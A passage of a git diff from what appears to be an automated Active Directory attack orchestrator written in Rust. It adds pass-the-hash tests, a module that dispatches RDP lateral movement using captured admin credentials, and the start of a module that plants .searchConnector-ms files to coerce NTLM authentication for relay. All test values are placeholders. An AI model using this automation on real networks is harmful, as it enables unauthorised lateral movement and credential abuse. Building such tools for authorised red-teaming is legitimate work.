assert_eq!(payload["technique"], "pass_the_hash"); + assert_eq!(payload["protocol"], "smb"); + assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn pth_work_construction() { + let work = PthWork { + dedup_key: "pth:192.168.58.22:admin:aad3b435".into(), + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + username: "admin".into(), + ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(), + domain: "contoso.local".into(), + }; + assert_eq!(work.username, "admin"); + assert_eq!(work.ntlm_hash.len(), 32); + } + + #[test] + fn domain_fallback_bare_hostname() { + let hash_domain = ""; + let hostname = "srv01"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, ""); + } + + #[test] + fn take_5_limiting() { + let items: Vec = (0..20).collect(); + let taken: Vec<_> = items.into_iter().take(5).collect(); + assert_eq!(taken.len(), 5); + } + + // --- collect_pth_work tests --- + + #[test] + fn collect_empty_state_returns_none() { + let state = StateInner::new("test".into()); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_no_hashes_returns_none() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_hashes_no_hosts_returns_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_hash_and_smb_host_produces_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].username, "admin"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn collect_skips_owned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.20", "web01.contoso.local")); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_dedup_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark as already processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_filters_non_ntlm_hashes() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-aes".into(), + username: "admin".into(), + hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret + hash_type: "aes256-cts-hmac-sha1-96".into(), + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // AES hash type should be rejected + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_short_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435", // too short, not 32 chars - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_empty_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "", // empty - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_domain_fallback_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_domain_fallback_bare_hostname_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01", // no dot, no domain part + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hashes_multiple_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + // 2 hashes x 2 hosts = 4 work items + assert_eq!(work.len(), 4); + } + + #[test] + fn collect_dedup_key_lowercases_username() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.contains(":administrator:")); + } + + #[test] + fn collect_mixed_owned_and_unowned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + state.hosts.push(make_smb_host( + "192.168.58.20", + "srv02.contoso.local", + false, // not owned + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_mixed_smb_and_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.10", "web01.contoso.local")); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_smb_detection_via_smb_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["SMB".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_smb_detection_via_cifs_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["cifs/srv01.contoso.local".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_partial_dedup_only_skips_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark only admin as processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].username, "svcacct"); + } + + #[test] + fn collect_hostname_preserved_in_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "dc01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hash_domain_preferred_over_hostname_domain() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + // Hash domain takes priority over hostname domain + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_ntlm_hash_type_case_insensitive() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-1".into(), + username: "admin".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret + hash_type: "Ntlm".into(), // mixed case + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs b/ares-cli/src/orchestrator/automation/rbcd.rs index b28228c6..310fc005 100644 --- a/ares-cli/src/orchestrator/automation/rbcd.rs +++ b/ares-cli/src/orchestrator/automation/rbcd.rs @@ -99,28 +99,14 @@ pub async fn auto_rbcd_exploitation( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - + // Find credential for the source user. Cross-forest ACL + // edges (e.g. tyron.lannister@sk → braavos$@essos) put the + // source user in a different domain than the vuln's `domain` + // field (which is the target's domain), so we cannot + // domain-restrict against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs new file mode 100644 index 00000000..5c984dce --- /dev/null +++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs @@ -0,0 +1,716 @@ +//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389. +//! +//! Targets hosts with RDP service (port 3389) that are not yet owned. +//! Uses xfreerdp or similar tooling to authenticate and execute commands +//! via RDP, complementing WinRM lateral movement for hosts that only +//! expose RDP. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// RDP lateral movement to hosts with port 3389. +/// Interval: 45s. +pub async fn auto_rdp_lateral(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("rdp_lateral") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_rdp_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "rdp_lateral", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("rdp_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "RDP lateral movement dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.host_ip, "RDP lateral deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral"); + } + } + } + } +} + +/// Collect RDP lateral movement work items from current state. +/// +/// Extracted from the async loop for testability. +fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Skip already-owned hosts + if host.owned { + continue; + } + + // Check for RDP service (port 3389) + let has_rdp = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + if !has_rdp { + continue; + } + + let dedup_key = format!("rdp:{}", host.ip); + if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Find admin credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any credential with a password + state.credentials.iter().find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(RdpWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +struct RdpWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential { + Credential { + id: format!("c-{}", username), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, services: Vec, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test-op".into()); + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_no_work() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_rdp_and_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_host_without_rdp_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["445/tcp microsoft-ds".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_owned_host_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + true, // already owned + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_falls_back_to_non_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Only a non-admin credential available + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user1"); + assert!(!work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_prefers_admin_over_non_admin() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + s.credentials.push(make_credential( + "admin", + "Adm1nP@ss!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_no_cred_for_domain_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Credential for wrong domain + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_bare_hostname_matches_any_domain_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + // Bare hostname (no domain suffix) → domain = "" → matches any cred + s.hosts.push(make_host( + "192.168.58.10", + "srv01", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.11", + "srv02.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.12", + "web01.contoso.local", + vec!["80/tcp http".into()], // no RDP + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.11")); + } + + #[tokio::test] + async fn collect_cred_with_empty_password_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "", "contoso.local", true)); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_rdp_detection_by_name() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["remote desktop rdp".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_dedup_key_format() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work[0].dedup_key, "rdp:192.168.58.10"); + } + + #[tokio::test] + async fn collect_cross_domain_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.20", + "srv01.fabrikam.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + s.credentials.push(make_credential( + "fadmin", + "F@bPass1!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + // contoso host uses contoso cred + let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap(); + assert_eq!(contoso_work.credential.domain, "contoso.local"); + // fabrikam host uses fabrikam cred + let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap(); + assert_eq!(fab_work.credential.domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_rdp_work_via_shared_state() { + let shared = crate::orchestrator::state::SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + state.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + } + + #[test] + fn dedup_key_format() { + let key = format!("rdp:{}", "192.168.58.22"); + assert_eq!(key, "rdp:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral"); + } + + #[test] + fn rdp_service_detection() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn no_rdp_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn rdp_service_detection_by_name() { + let services = ["remote desktop rdp".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_service_detection_case_insensitive() { + let services = ["3389/TCP MS-WBT-SERVER".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_payload_structure() { + let payload = serde_json::json!({ + "technique": "rdp_lateral", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "rdp_lateral"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn rdp_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RdpWork { + dedup_key: "rdp:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert!(work.credential.is_admin); + } + + #[test] + fn admin_credential_preferred() { + // The module first looks for admin creds, then falls back to any with password + let is_admin = true; + let has_password = true; + let admin_match = is_admin && has_password; + assert!(admin_match); + } + + #[test] + fn empty_services_no_rdp() { + let services: Vec = vec![]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } +} diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs new file mode 100644 index 00000000..53c7ce0a --- /dev/null +++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs @@ -0,0 +1,502 @@ +//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares. +//! +//! .searchConnector-ms XML files trigger WebDAV connections when a user browses +//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion), +//! searchConnector files force HTTP-based NTLM auth which bypasses SMB signing +//! requirements, enabling relay to LDAP/ADCS even when SMB signing is enforced. +//! +//! This module targets writable shares that auto_share_coercion has already +//! identified, deploying a complementary coercion technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SearchConnector coercion work items from current state. +/// +/// Pure logic extracted from `auto_searchconnector_coercion` so it can be +/// unit-tested without needing a `Dispatcher` or async runtime. +fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for share in &state.shares { + if !share.permissions.to_uppercase().contains("WRITE") { + continue; + } + + let dedup_key = format!("searchconn:{}:{}", share.host, share.name); + if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) { + continue; + } + + // Find credential for the share's host + let host_info = state.hosts.iter().find(|h| h.ip == share.host); + let domain = host_info + 